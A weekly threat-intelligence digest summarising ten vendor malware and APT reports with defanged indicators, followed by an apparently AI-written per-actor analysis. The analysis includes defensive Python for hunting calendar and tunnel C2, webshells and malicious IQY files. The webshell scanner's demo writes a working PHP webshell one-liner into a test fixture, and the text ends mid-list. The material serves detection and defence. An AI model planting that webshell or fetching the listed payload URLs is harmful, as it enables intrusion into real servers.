Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 51 threat intelligence reports and have summarised the findings along with the relevant metadata that was collected. Below you can find a short summary of 10 reports, the related threats, tools and threat actors, a link to the source, and a number of indicators of compromise (IoCs) extracted from the original reports. More granular information on all reports, including TTPs, is available via RST Report Hub.

Title: The Sharp Taste of Mimolette: Analyzing Mimo's Latest Campaign Targeting Craft CMS
Link: https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/
Summary: The report details the exploitation of CVE-2025-32432, a critical remote code execution vulnerability in the Craft Content Management System, which was actively exploited by the Mimo intrusion set between February 28 and May 2, 2025. The attackers deployed a webshell via a specially crafted GET request, enabling them to execute arbitrary commands and run infection scripts that deployed a cryptominer and residential proxyware, notably through an ELF binary named 4l4md4r.
The Mimo group, motivated primarily by financial gain, has also begun diversifying its tactics, adding ransomware to its established cryptomining operations, while maintaining a significant online presence that hints at its operational methods and motivations.
Threats: hezb xmrig_miner peer2profit_tool iproyal_pawns_tool 4l4md4r residential_proxy_technique mauricrypt mimus goloader
Indicators of compromise:
-------------------------
ip: 85[.]106[.]113[.]168
domain: windows[.]n1tro[.]cyou
url: http://15[.]188[.]246[.]198/alamdar[.]x86_64, http://15[.]188[.]246[.]198/4l4md4r[.]sh, http://15[.]188[.]246[.]198/hezb[.]x86_64
hash:
- sha256=1aa4d88a38f5a27a60cfc6d6995f065da074ee340789ed00ddc29abc29ea671e
- sha256=3a71680ffb4264e07da4aaca16a3f8831b9a30d444215268e82b2125a98b94aa
- sha256=fc04f1ef05847607bce3b0ac3710c80c5ae238dcc7fd842cd15e252c18dd7a62
- sha256=7868cb82440632cc4fd7a451a351c137a39e1495c84172a17894daf1d108ee9a
- sha256=2e46816450ad1b4baa85e2a279031f37608657be93e1095238e2b6c36bbb3fd5
email: 4l4md4r@proton[.]me

Title: Pakistan Telecommunication Company (PTCL) Targeted by Bitter APT During Heightened Regional Conflict
Link: https://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict
Summary: On May 7, 2025, analysts from EclecticIQ reported a spear-phishing campaign by the threat actor Bitter APT targeting Pakistan Telecommunication Company Limited (PTCL) amid rising military tensions between Pakistan and India. The campaign used compromised email credentials from the Pakistan Counter Terrorism Department (CTD) to deliver malware through malicious IQY files, which executed a variant of WmRAT.
This operation, aimed at espionage, targeted key PTCL personnel and established persistent access to PTCL's systems, indicating Bitter APT's strategic intent to collect intelligence on Pakistan's telecommunications infrastructure during a period of regional instability.
Threats: bitter_group sindoor_campaign spear-phishing_technique wmrat stealc lolbin_technique supply_chain_technique
Indicators of compromise:
-------------------------
ip: 185[.]244[.]151[.]84, 185[.]244[.]151[.]87
domain: tradesmarkets[.]greenadelhouse[.]com, jacknwoods[.]com, greenadelhouse[.]com
url: https://fogomyart[.]com/vcswin
hash:
- sha256=36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590
- sha256=de6b41ab72bfa4114c79464d1083737c6dfa55767339d732db8d2edd462832ed
- sha256=edb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56

Title: Chasing Eddies: New Rust-based InfoStealer used in CAPTCHA campaigns
Link: https://www.elastic.co/security-labs/eddiestealer
Summary: Elastic Security Labs has identified a new infostealer named EDDIESTEALER, written in Rust and distributed through fake CAPTCHA campaigns targeting Windows systems. The infection starts with a malicious JavaScript payload that prompts users to execute a PowerShell script, which then downloads EDDIESTEALER from adversary-controlled servers. The infostealer steals sensitive data, including credentials and cryptocurrency wallet information, and uses evasion techniques such as custom API call mechanisms and NTFS Alternate Data Streams for self-deletion.
EDDIESTEALER communicates with its command and control server through multiple HTTP POST requests and mimics credential theft techniques by interacting with browser password managers; its reliance on Rust's memory-safe features and encrypted communication formats complicates reverse engineering.
Threats: eddiestealer ghostpulse unicorn_tool api_obfuscation_technique latrodectus deskshare_tool chromekatz_tool cookiekatz_tool cookiemonster credentialkatz_tool
Indicators of compromise:
-------------------------
ip: 45[.]144[.]53[.]145, 84[.]200[.]154[.]47
domain: shiglimugli[.]xyz, xxxivi[.]com, llll[.]fit, plasetplastik[.]com, militrex[.]wiki
url: https://llll[.]fit/io

Title: Tactics and tools of the BO Team group
Link: https://securelist.ru/bo-team/112753/
Summary: BO Team, a cyber threat group that surfaced in early 2024, specifically targets Russian organizations in support of Ukraine amid the ongoing conflict. Using sophisticated phishing campaigns with malicious attachments to initiate attacks, the group deploys malware such as BrockenDoor, Remcos, and DarkGate, and engages in destructive actions such as deleting backups and critical files, along with extorting ransom using Babuk ransomware. BO Team's tactics deviate from typical hacktivist approaches by employing unique malware and advanced methods such as Living Off the Land techniques to blend into legitimate operations, revealing a profoundly adaptive and sophisticated threat focused on prolonged infiltration and calculated actions against Russian entities.
Threats: bo_team_group darkgate brockendoor remcos_rat sdelete_tool babuk lockbit lolbin_technique reversessh_tool procdump_tool minidump_tool handlekatz_tool nanodump_tool ntdsutil_tool wevtutil_tool anydesk_tool shadow_copies_delete_technique
Indicators of compromise:
-------------------------
url: http://194[.]87[.]252[.]171:443/xwizards[.]exe
Title: Analysis of T-Rex coin miner attacks on domestic PC rooms
Link: https://asec.ahnlab.com/ko/88147/
Summary: AhnLab Security Intelligence Center (ASEC) has reported a series of attacks installing coin miners in domestic PC rooms, attributed to an attacker active since 2022. The attacks, which began in late 2024, exploit vulnerabilities in PC room management programs, although the initial entry method remains unknown. The attacker uses Gh0st RAT, developed by the C. Rufus Security Team in China, to maintain control over the compromised systems. The malware uses obfuscation techniques and persists by registering itself as a service, allowing remote command execution. The final payload is the T-Rex coin miner, used to mine cryptocurrencies such as Ethereum and Ravencoin, which is installed under continually changing paths to evade detection.
The attacker also deploys malicious code that targets competing coin miners, demonstrating a strategic focus on keeping control of their operations within the targeted environments.
Threats: t-rex gh0st_rat themida_tool mpress_tool xmrig_miner killproc coinminer
Indicators of compromise:
-------------------------
ip: 103[.]25[.]19[.]32, 113[.]21[.]17[.]102, 115[.]23[.]126[.]178, 121[.]147[.]158[.]132, 122[.]199[.]149[.]129
url: http://112[.]217[.]151[.]10/config[.]txt, http://112[.]217[.]151[.]10/mm[.]exe, http://112[.]217[.]151[.]10/pms[.]exe, http://112[.]217[.]151[.]10/statx[.]exe, http://121[.]67[.]87[.]250/3[.]exe
hash:
- md5=04840bb2f22c28e996e049515215a744
- md5=0b05b01097eec1c2d7cb02f70b546fff
- md5=142b976d89400a97f6d037d834edfaaf
- md5=15ba916a57487b9c5ceb8c76335b59b7
- md5=15d6f2a36a4cd40c9205e111a7351643

Title: Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites
Link: https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites/
Summary: Since November 2024, Mandiant Threat Defense has been monitoring the UNC6032 campaign, which exploits interest in AI tools by using fake video generator websites, promoted through malicious social media ads, to distribute malware. The malware, named STARKVEIL, is a Rust-based dropper that launches further malicious modules, including the backdoors XWORM and FROSTRIFT, and uses techniques such as DLL side-loading and process injection to evade detection.
The campaign shows the threat actors' reliance on social engineering, targeting users with seemingly legitimate advertisements and evolving their tactics to improve operational stealth and effectiveness.
Threats: unc6032_group lumma_stealer starkveil xworm_rat frostrift grimpull dll_sideloading_technique process_injection_technique coilhatch ngrok_tool dllsearchorder_hijacking_technique
Indicators of compromise:
-------------------------
url: https://klingxai[.]com, https://lumalabsai[.]in, https://lumalabsai[.]in/complete, tcp://artisanaqua[.]ddnsking[.]com:25699, https://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver[.]exe

Title: Earth Lamia Develops Custom Arsenal to Target Multiple Industries
Link: https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html
Summary: Trend Research has identified the advanced persistent threat (APT) group Earth Lamia, operational since at least 2023, which primarily targets organizations in Brazil, India, and Southeast Asia. The group exploits web application vulnerabilities, particularly through SQL injection, to gain unauthorized access; it initially focused on the financial services sector and later expanded to logistics, online retail, IT companies, universities, and government entities. Earth Lamia uses custom-developed tools such as PULSEPACK, a .NET backdoor, and BypassBoss, a privilege escalation tool, designed to evade detection, and combines file-drop mechanisms with encryption for payload protection. The group has shown connections to other threat operations, indicating possible collaboration or shared victim targeting among different cyber adversaries.
Threats: earth_lamia_group pulsepack bypassboss_tool stac6451_campaign cl-sta-0048_campaign dll_sideloading_technique apt-q-14_group mimikatz_tool juicypotato_tool voidmaw_tool cobalt_strike_tool brc4_tool mimic_ransomware godpotato_tool dragonrank_group unc5174_group vshell snowlight credential_dumping_technique rakshasa_tool fscan_tool stowaway_tool
Indicators of compromise:
-------------------------
Title: Mark Your Calendar: APT41 Innovative Tactics
Link: https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics/
Summary: In late October 2024, the Google Threat Intelligence Group (GTIG) identified malware named "TOUGHPROGRESS" being distributed via a compromised government website and attributed it to the Chinese threat actor APT41. The malware used Google Calendar for command and control; spear-phishing emails directed targets to a ZIP archive containing a deceptive LNK file posing as a PDF. TOUGHPROGRESS consists of three modules that use stealth techniques to avoid detection and exchange encrypted commands via Google Calendar. GTIG countered the campaign by creating detection signatures, dismantling the associated infrastructure, and working with the Mandiant FLARE team to analyze the malware's encryption protocol, and noted APT41's history of abusing legitimate cloud services.
Threats: winnti_group toughprogress spear-phishing_technique process_hollowing_technique plusdrop plusinject voldemort dusttrap plusbed
Indicators of compromise:
-------------------------
Title: Threat Intelligence NodeSnake Malware Campaign
Link: https://www.quorumcyber.com/wp-content/uploads/2025/04/20250416-Higher-Education-Sector-RAT-MP.pdf
Summary: In early 2025, Quorum Cyber's Threat Intelligence team analyzed two Remote Access Trojans (RATs), NodeSnake.A and NodeSnake.B, found targeting UK higher education institutions. The analysis highlights the evolution of NodeSnake, with NodeSnake.B showing improved stealth, operational flexibility, and the ability to execute interactive payloads for real-time command execution. Both variants use legitimate infrastructure, particularly Cloudflare, for command-and-control communication, and the investigation linked NodeSnake to the ransomware group Interlock, suggesting a broader campaign against high-value organizations involving double extortion through data leaks and ransom notes.
The analysis underscored a rising trend of using Cloudflare Tunnels for RAT delivery and the sophisticated operational framework of NodeSnake, marking it as a significant cyber threat with advanced evasion techniques.Threats: nodesnake interlock xworm_rat asyncrat venomratIndicators of compromise:-------------------------ip: 212[.]237[.]217[.]182, 168[.]119[.]96[.]41, 216[.]245[.]184[.]181, 140[.]82[.]44[.]117, 45[.]61[.]136[.]202, 84[.]200[.]24[.]41, 45[.]61[.]136[.]228, 188[.]34[.]195[.]44domain: speak-head-somebody-stays[.]trycloudflare[.]com, mortgage-i-concrete-origins[.]trycloudflare[.]com, musicians-implied-less-model[.]trycloudflare[.]com, suffering-arnold-satisfaction-prior[.]trycloudflare[.]com, strain-brighton-focused-kw[.]trycloudflare[.]com, sublime-forecasts-pale-scored[.]trycloudflare[.]com, washing-cartridges-watts-flags[.]trycloudflare[.]com, investigators-boxing-trademark-threatened[.]trycloudflare[.]comurl: http://23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/cht, http://23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/klg, https://apple-online[.]shop/ChromeSetup[.]exe, https://rvthereyet[.]com/wp-admin/images/rsggl[.]phphash: - md5=f76d907ca3817a8b2967790315265469, - md5=e11d147dad6e47a1cecb1f7255f95a55, - md5=f7f679420671b7e18677831d4d276277, - sha1=5cc18e0df62c0d68710e14b31e2270f2ec7ed166, - sha1=1cb6a93e6d28d63d479a1ea59f7d5b258f15c5c3, - sha256=f99fb136427fc8ed344d455eb1cbd7eabc405620ae8b4205d89a8e2e1e712256, - sha256=e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1email:Title: When Samsung’s Magic Turns Tragic: A Tale of Unauthorized MiningLink: https://www.esentire.com/blog/when-samsungs-magic-turns-tragic-a-tale-of-unauthorized-miningSummary: In mid-May 2025, a critical vulnerability (CVE-2025-4632) in Samsung MagicINFO 9 Server was exploited, allowing threat actors to execute remote code and write files with system-level privileges. 
Scoring 9.8 on the CVSS scale, the vulnerability enabled attackers to implement automated commands for persistence, install the remote management tool AnyDesk, and deploy a variant of the XMRig cryptocurrency miner disguised as "smi2.exe." The attack began with reconnaissance using the legitimate process tomcat9.exe, and progressed through multi-stage PowerShell and batch scripts, facilitating the creation of administrative users and manipulation of antivirus settings, ultimately achieving unauthorized Monero mining while avoiding detection through stealthy operations.Threats: xmrig_miner anydesk_tool lolbin_technique disabling_antivirus_techniqueIndicators of compromise:-------------------------ip: 157[.]230[.]106[.]100, 173[.]249[.]48[.]227, 185[.]213[.]26[.]27domain: crmmr[.]icc[.]meurl: http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&xbf=smi2[.]exe&ar=1&dbg=1&sdir=RND&rdir=%TEMP%&dlt=pshell, https://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&xbf=smi2[.]exe&ar=1&dbg=1&sdir=RND&rdir=%TEMP%&dlt=pshell, http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=cutil&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, https://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&dlt=cutil&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, https://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RNDhash: - md5=2b9c5f6f01a7a06beeb533967a6e23ef, - sha256=9303b671778422754bcf8fc97cd99f9f19173473ff515a6956bc61bc1de84389, - md5=93d9d7b19403a6b794cbf4277e66bca0, - sha256=e482617f9e9066bb875e2973bf3f469074cb266ec270deed933b8bd27070f62b, - md5=c0ed4f906576c06d861302e8cf924309, - sha256=8e1c569508baacd7803f80728c03ed1d6ab098a1576c6470420e7a3af84c489c, 
- md5=5b8961a8c3b6ca1d1e2ef3155c7c1b53, - sha256=116fbb00ecdfe1ff4a9511e096c30a233b02be54d38e9a3d6a7e43a3205b1640, - md5=d9c1409e32a1b33070bed3a295123e66, - sha256=a8607309f60e9f1fac7f850d0daa8c41986a4fede610852b9e3ef8a3d5527a59, - md5=0c0195c48b6b8582fa6f6373032118da, - sha256=11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5email:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
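The APT41 and NodeSnake entries above both hide C2 behind legitimate cloud infrastructure: TOUGHPROGRESS reads commands from one specific Google Calendar through the public Calendar API, and NodeSnake beacons through `trycloudflare.com` quick tunnels, so neither is caught by a plain bad-domain list. The following added example (ours, not code from GTIG, Quorum Cyber or RST Cloud) hunts a constructed web-proxy log for both. It refangs the calendar ID and tunnel hostnames from the IoC lists above, and it generalises beyond those IoCs by flagging any `@group.calendar.google.com` calendar that is not on an allowlist and any `trycloudflare.com` hostname at all. The log format, the sample records and the empty allowlist are assumptions.

```python
import re
from urllib.parse import urlparse, unquote

def refang(ioc):
    """Turn the report's defanged form (a[.]b) back into a matchable hostname."""
    return ioc.replace("[.]", ".").lower()

# IoCs copied from the APT41 / TOUGHPROGRESS and NodeSnake entries above.
APT41_CALENDAR_IDS = {refang(
    "ff57964096cadc1a8733cf566b41c9528c89d30edec86326c723932c1e79ebf0"
    "@group[.]calendar[.]google[.]com")}
TUNNEL_IOCS = {refang(h) for h in (
    "term-restore-satisfied-hence[.]trycloudflare[.]com",
    "ways-sms-pmc-shareholders[.]trycloudflare[.]com",
    "speak-head-somebody-stays[.]trycloudflare[.]com",
    "mortgage-i-concrete-origins[.]trycloudflare[.]com",
    "musicians-implied-less-model[.]trycloudflare[.]com",
    "suffering-arnold-satisfaction-prior[.]trycloudflare[.]com",
    "strain-brighton-focused-kw[.]trycloudflare[.]com",
    "sublime-forecasts-pale-scored[.]trycloudflare[.]com",
    "washing-cartridges-watts-flags[.]trycloudflare[.]com",
    "investigators-boxing-trademark-threatened[.]trycloudflare[.]com",
)}
# Assumption: group calendars the organisation legitimately integrates with (none here).
ALLOWED_CALENDAR_IDS = set()

CALENDAR_EVENTS_RE = re.compile(r"^/calendar/v3/calendars/([^/]+)/events")
# Assumption: one proxy record per line, "<timestamp> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

def classify_url(url):
    """Label one requested URL, or return None if nothing about it is suspicious."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if host == "www.googleapis.com":
        m = CALENDAR_EVENTS_RE.match(p.path)
        if m:
            calendar_id = unquote(m.group(1)).lower()   # clients send "@" as %40
            if calendar_id in APT41_CALENDAR_IDS:
                return "toughprogress-calendar-c2"
            if (calendar_id.endswith("@group.calendar.google.com")
                    and calendar_id not in ALLOWED_CALENDAR_IDS):
                return "calendar-api-unlisted-group-calendar"
        return None
    if host.endswith(".trycloudflare.com"):
        return "nodesnake-tunnel-ioc" if host in TUNNEL_IOCS else "trycloudflare-quick-tunnel"
    return None

def hunt(lines):
    """Return (client-ip, label, url) for every proxy record that matches a rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue          # record does not fit the assumed format; skip it
        _ts, client, _method, url, _status = m.groups()
        label = classify_url(url)
        if label:
            findings.append((client, label, url))
    return findings

# Constructed sample log: not real traffic; the hosts come from the IoC lists above.
SAMPLE_LOG = [
    "2025-05-28T10:01:02Z 10.1.2.3 GET https://www.googleapis.com/calendar/v3/calendars/ff57964096cadc1a8733cf566b41c9528c89d30edec86326c723932c1e79ebf0%40group.calendar.google.com/events 200",
    "2025-05-28T10:01:05Z 10.1.2.4 GET https://www.googleapis.com/calendar/v3/calendars/primary/events 200",
    "2025-05-28T10:02:00Z 10.1.2.5 GET https://speak-head-somebody-stays.trycloudflare.com/update 200",
    "2025-05-28T10:03:00Z 10.1.2.6 POST https://random-words-go-here.trycloudflare.com/beacon 200",
    "2025-05-28T10:04:00Z 10.1.2.7 GET https://www.google.com/ 200",
    "2025-05-28T10:05:00Z 10.1.2.8 GET https://www.googleapis.com/calendar/v3/calendars/abc123%40group.calendar.google.com/events?maxResults=10 200",
]

if __name__ == "__main__":
    for client, label, url in hunt(SAMPLE_LOG):
        print(f"{client:<10} {label:<40} {url}")
```

The unlisted-calendar rule is the one that pays off after the IoCs rotate: TOUGHPROGRESS only needs a fresh calendar, and the API endpoint stays the same, so the calendar ID, not the domain, is the stable hook. Expect to tune the allowlist on any host that runs a legitimate Google Workspace integration.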
Analysis Summary
The provided article summarizes findings from multiple, distinct threat intelligence reports. Since the request requires focusing on a *specific* threat actor, I will structure the findings associated with each identified actor/group mentioned in the summaries.
# Threat Actor: Mimo intrusion set (Mimo Group)
## Attribution & Identity
Identified as the "Mimo intrusion set" or "Mimo group."
## Activity Summary
Actively exploited the critical vulnerability CVE-2025-32432 (a remote code execution flaw) in the Craft Content Management System between February 28 and May 2, 2025. The group is expanding its operations to include ransomware alongside its primary cryptomining activities.
## Tactics, Techniques & Procedures
- Exploitation of CVE-2025-32432 via specially crafted GET requests.
- Deployment of a webshell through the exploited endpoint, giving arbitrary command execution.
- Execution of infection scripts (the `4l4md4r.sh` stager among the listed URLs) that fetch the ELF payloads and deploy the XMRig cryptominer and residential proxyware (the report's tags name IPRoyal Pawns and Peer2Profit).
- Diversification into ransomware alongside the established cryptomining operation.
- A significant public online presence that hints at the group's operational methods and motivations.
## Targeting
- Sectors: Organizations utilizing Craft Content Management System.
- Geography: Not explicitly mentioned, implied global based on software usage.
- Victims: Unknown specific organizations mentioned in this summary.
## Tools & Infrastructure
- Malware families used: XMRig cryptominer; residential proxyware (IPRoyal Pawns, Peer2Profit); Hezb, GoLoader and MauriCrypt per the report's threat tags; ransomware (newly incorporated).
- Specific ELF binary used: `4l4md4r`.
- Infrastructure (C2, domains, IPs):
- IP: 85[.]106[.]113[.]168
- Domain: windows[.]n1tro[.]cyou
- URLs: http://15[.]188[.]246[.]198/alamdar[.]x86_64, http://15[.]188[.]246[.]198/4l4md4r[.]sh, http://15[.]188[.]246[.]198/hezb[.]x86_64
- Email: 4l4md4r@proton[.]me
## Implications
The group is prioritizing financial gain, evidenced by cryptomining and the addition of ransomware, indicating an increased threat to operational uptime and data confidentiality for vulnerable organizations.
## Mitigations
Patch Craft CMS against CVE-2025-32432 and review web server access logs for the crafted GET requests the report describes, including any traffic from the listed IP 85[.]106[.]113[.]168. Hunt for unauthorized webshells in the web root, for the `4l4md4r`, `alamdar` and `hezb` ELF binaries and the listed hashes, for outbound connections to 15[.]188[.]246[.]198 and windows[.]n1tro[.]cyou, and for the sustained CPU load of a miner or the unexplained egress of residential proxyware.
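To make the webshell monitoring above concrete, here is an added example (ours, not code from Sekoia or from Craft CMS) that scans a Craft-style web root, where `index.php` is the only PHP file expected, for PHP files that execute request-controlled input and for PHP placed anywhere other than the entry point. The heuristics, the directory layout and the planted sample files are assumptions; tune the patterns and the entry-point rule to your deployment.

```python
import os
import re
import tempfile
import time

# Heuristics over raw bytes, so odd encodings or binary padding do not break matching.
PATTERNS = [
    ("eval", re.compile(rb"\beval\s*\(", re.I)),
    ("assert", re.compile(rb"\bassert\s*\(", re.I)),
    ("exec-family", re.compile(rb"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)),
    ("base64_decode", re.compile(rb"\bbase64_decode\s*\(", re.I)),
    ("request-input", re.compile(rb"\$_(?:GET|POST|REQUEST|COOKIE)\b")),
]
EXECUTORS = {"eval", "assert", "exec-family"}
PHP_EXT = (".php", ".phtml", ".php5", ".phar")

def scan_bytes(data):
    """Names of the heuristics that fire on a file's contents, in PATTERNS order."""
    return [name for name, rx in PATTERNS if rx.search(data)]

def looks_like_webshell(hits):
    """Code execution fed from request input, or a dense cluster of suspicious calls."""
    return (bool(set(hits) & EXECUTORS) and "request-input" in hits) or len(hits) >= 3

def scan_web_root(root, modified_within_days=30):
    """Walk a web root and report PHP files that look planted. Assumption: Craft's
    layout, where web/index.php is the only PHP file that belongs there."""
    cutoff = time.time() - modified_within_days * 86400
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                hits = scan_bytes(fh.read(1 << 20))   # first 1 MiB is enough for a shell
            reasons = []
            if looks_like_webshell(hits):
                reasons.append("dangerous-code:" + ",".join(hits))
            if rel != "index.php":
                reasons.append("php-outside-entrypoint")
            if reasons:
                # recency is supporting context, not a finding on its own
                if os.path.getmtime(path) >= cutoff:
                    reasons.append("recently-modified")
                findings.append((rel, reasons))
    return sorted(findings)

def demo():
    """Build a throwaway Craft-like web root (constructed here) with a clean entry
    point and one planted webshell, then scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php\n"
                 b"define('CRAFT_BASE_PATH', dirname(__DIR__));\n"
                 b"require CRAFT_BASE_PATH . '/vendor/autoload.php';\n"
                 b"$app = require CRAFT_BASE_PATH . '/vendor/craftcms/cms/bootstrap/web.php';\n"
                 b"$app->run();\n")
    with open(os.path.join(root, "uploads", "cache.php"), "wb") as fh:
        fh.write(b"<?php @eval(base64_decode($_POST['c'])); ?>\n")
    return scan_web_root(root)

if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", "; ".join(reasons))
```

Run it from cron against the real `web/` directory and diff the output against the previous run; a planted shell shows up as a new path, and an obfuscated one that dodges the function patterns still trips the entry-point rule because Craft never writes PHP under `web/` on its own.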
***
# Threat Actor: Bitter APT (Bitter Group)
## Attribution & Identity
Identified as "Bitter APT" or "bitter\_group." Operationally linked to the "sindoor\_campaign."
## Activity Summary
Conducted a spear-phishing campaign targeting the Pakistan Telecommunication Company Limited (PTCL) on May 7, 2025, amid heightened regional military tensions between Pakistan and India. The objective was espionage and establishing persistent access.
## Tactics, Techniques & Procedures
- Spear-phishing campaigns.
- Use of compromised Pakistan Counter Terrorism Department (CTD) email accounts as the sending identity, so the lure arrives from a trusted government sender.
- Delivery via malicious IQY (Excel Web Query) files, which instruct Excel to fetch content from an attacker-controlled URL.
- Technique: abuse of a trusted third party's credentials (credential compromise rather than a software supply-chain attack); LOLBIN usage, since Excel's own web-query feature performs the download.
- Execution of a WmRAT variant to establish persistent access.
## Targeting
- Sectors: Telecommunications.
- Geography: Pakistan.
- Victims: Pakistan Telecommunication Company Limited (PTCL).
## Tools & Infrastructure
- Malware families used: WmRAT variant.
- Infrastructure (C2, domains, IPs):
- IPs: 185[.]244[.]151[.]84, 185[.]244[.]151[.]87
- Domains: tradesmarkets[.]greenadelhouse[.]com, jacknwoods[.]com, greenadelhouse[.]com
- URLs: https://fogomyart[.]com/vcswin
## Implications
This actor demonstrates state-aligned capabilities by targeting critical national infrastructure during a period of geopolitical tension, suggesting intelligence gathering as a primary goal.
## Mitigations
Heightened email security awareness and strict controls on attachments from external or unexpected senders. Block or quarantine `.iqy` (Excel Web Query) attachments at the mail gateway, since they make Excel pull content from an arbitrary URL, and restrict external data connections through the Excel Trust Center. Monitor for Excel spawning network connections or child processes, for the listed domains and IPs, and for lateral movement originating from endpoints that opened such files.
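IQY files are plain text, so the delivery vector is easy to inspect at the gateway. The following added example (ours, not code from EclecticIQ) parses the `.iqy` layout (a `WEB` header, a version line, the query URL, then optional `Key=Value` option lines) and blocks files whose URL points at a listed IoC host, an IP literal, cleartext HTTP, or any host outside an allowlist. The sample files are constructed: the first reuses the `fogomyart[.]com/vcswin` URL from the IoC list above, and the allowlisted intranet host is hypothetical.

```python
import re
from urllib.parse import urlparse

# Hosts from the Bitter APT IoC list above (defanged on the page, refanged here).
BITTER_IOC_HOSTS = {h.replace("[.]", ".") for h in (
    "tradesmarkets[.]greenadelhouse[.]com", "jacknwoods[.]com",
    "greenadelhouse[.]com", "fogomyart[.]com")}
IP_LITERAL_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def parse_iqy(text):
    """Parse the plain-text .iqy layout: a 'WEB' header, a version line, the query URL,
    then optional lines such as Selection=... or Formatting=..."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel Web Query (.iqy) file")
    return {"version": lines[1], "url": lines[2], "extra": lines[3:]}

def assess_iqy(text, trusted_hosts=()):
    """Return (verdict, reasons, parsed). Assumption: trusted_hosts is the organisation's
    allowlist of internal data sources; every other host is treated as untrusted."""
    info = parse_iqy(text)
    u = urlparse(info["url"])
    host = (u.hostname or "").lower()
    trusted = {h.lower() for h in trusted_hosts}
    reasons = []
    if u.scheme not in ("http", "https"):
        reasons.append("unexpected-scheme:" + (u.scheme or "none"))
    elif u.scheme == "http":
        reasons.append("cleartext-http")
    if host in BITTER_IOC_HOSTS:
        reasons.append("known-ioc-host:" + host)
    if not host:
        reasons.append("no-host")
    elif IP_LITERAL_RE.match(host):
        reasons.append("ip-literal-host:" + host)
    elif host not in trusted:
        reasons.append("untrusted-host:" + host)
    return ("block" if reasons else "allow"), reasons, info

# Constructed sample files. The first reuses the URL listed under this campaign's IoCs.
MALICIOUS_IQY = "WEB\n1\nhttps://fogomyart.com/vcswin\n"
BENIGN_IQY = ("WEB\n1\nhttps://reports.intranet.example/sales.csv\n"
              "Selection=EntirePage\nFormatting=None\n")

if __name__ == "__main__":
    for name, text in (("malicious", MALICIOUS_IQY), ("benign", BENIGN_IQY)):
        verdict, reasons, info = assess_iqy(text, trusted_hosts=("reports.intranet.example",))
        print(f"{name}: {verdict} {reasons} url={info['url']}")
```

The allowlist is doing the real work: an IQY from an unknown sender has no business pointing anywhere but a known internal data source, and the IoC match only catches this one campaign. At the gateway the pragmatic policy is to quarantine every `.iqy` regardless and use this triage to decide what to release.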
***
# Threat Actor: EDDIESTEALER (New InfoStealer Campaign)
## Attribution & Identity
This section describes the campaign distributing a *new* malware named EDDIESTEALER. No established threat actor name is attributed to its development or propagation in this summary; the activity is associated with fake CAPTCHA campaigns.
## Activity Summary
Disseminating the new Rust-based EDDIESTEALER via deceptive Fake CAPTCHA campaigns targeting Windows systems.
## Tactics, Techniques & Procedures
- Acquisition method: Deceptive Fake CAPTCHA web pages.
- Stages: Malicious JavaScript payload initiates the infection, prompting the user to execute a PowerShell script, which then downloads the stealer.
- Evasion: Custom API call mechanisms, NTFS Alternate Data Streams for self-deletion.
- Data Exfiltration: communicates via multiple HTTP POST requests; credential theft targets browser password stores and cookies (the report's tags reference ChromeKatz, CookieKatz and CredentialKatz-style tooling).
## Targeting
- Sectors: General user population with Windows systems.
- Geography: Not specified.
- Victims: Windows users whose credentials and cryptocurrency wallets are targeted.
## Tools & Infrastructure
- Malware families used: EDDIESTEALER (written in Rust).
- Related/Associated Tools: ghostpulse, unicorn\_tool, chromekatz\_tool, cookiemonster, cookiekatz\_tool, credentialkatz\_tool.
- Infrastructure (C2, domains, IPs):
- IPs: 45[.]144[.]53[.]145, 84[.]200[.]154[.]47
- Domains: shiglimugli[.]xyz, xxxivi[.]com, llll[.]fit, plasetplasti
## Implications
